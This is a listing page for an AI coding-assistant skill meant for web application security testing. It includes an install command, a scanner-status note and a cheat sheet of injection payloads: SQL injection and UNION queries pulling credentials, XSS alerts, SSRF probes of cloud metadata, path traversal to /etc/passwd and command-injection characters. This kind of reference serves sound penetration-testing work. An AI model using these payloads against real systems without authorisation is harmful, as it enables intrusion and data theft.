.cursor/skills/web-security-expert/SKILL.md
Web application security expert. OWASP Top 10, XSS, SQLi, CSRF, SSRF, authentication bypass, IDOR. Use for web app security testing.
Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

```
npx skillsauth add ripgraphics/authorsinfo web-security-expert
```
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

| Vuln | Test | Payload Example |
|------|------|-----------------|
| SQLi | `'`, `"`, `1 OR 1=1` | `' UNION SELECT null,username,password FROM users--` |
| XSS | `<script>`, event handlers | `<img src=x onerror=alert(1)>` |
| SSRF | Internal URLs | `http://127.0.0.1`, `http://169.254.169.254` |
| IDOR | Change IDs | `/api/user/123` → `/api/user/124` |
| LFI | Path traversal | `../../../etc/passwd` |
| RCE | Command chars | `; id`, `\| whoami`, `` `id` `` |

```
# SQLi
' OR '1'='1
' UNION SELECT null,null,null--
'; WAITFOR DELAY '0:0:5'--

# XSS
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
javascript:alert(1)

# SSRF
http://127.0.0.1:80
http://[::]:80
http://169.254.169.254/latest/meta-data/

# LFI
....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
```

| Purpose | Tool |
|---------|------|
| Proxy | Burp Suite, OWASP ZAP |
| SQLi | sqlmap |
| XSS | XSStrike, dalfox |
| Fuzzing | ffuf, wfuzz |